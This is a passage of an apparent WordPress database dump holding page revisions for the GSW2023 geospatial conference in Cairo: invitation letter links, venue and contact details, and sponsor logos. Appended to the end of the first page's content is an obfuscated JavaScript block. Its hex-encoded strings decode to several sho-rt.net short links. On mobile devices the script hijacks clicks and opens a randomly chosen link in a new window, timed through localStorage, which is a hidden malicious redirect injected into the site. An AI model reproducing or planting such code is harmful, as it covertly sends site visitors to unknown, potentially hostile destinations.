main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-18 13:55:48','2023-06-18 13:55:48','',3066,'https://gsw2023.com/?p=4717',0,'revision','',0),
(4718,1,'2023-06-18 13:56:39','2023-06-18 13:56:39','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686739986286{margin-top: -35px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px 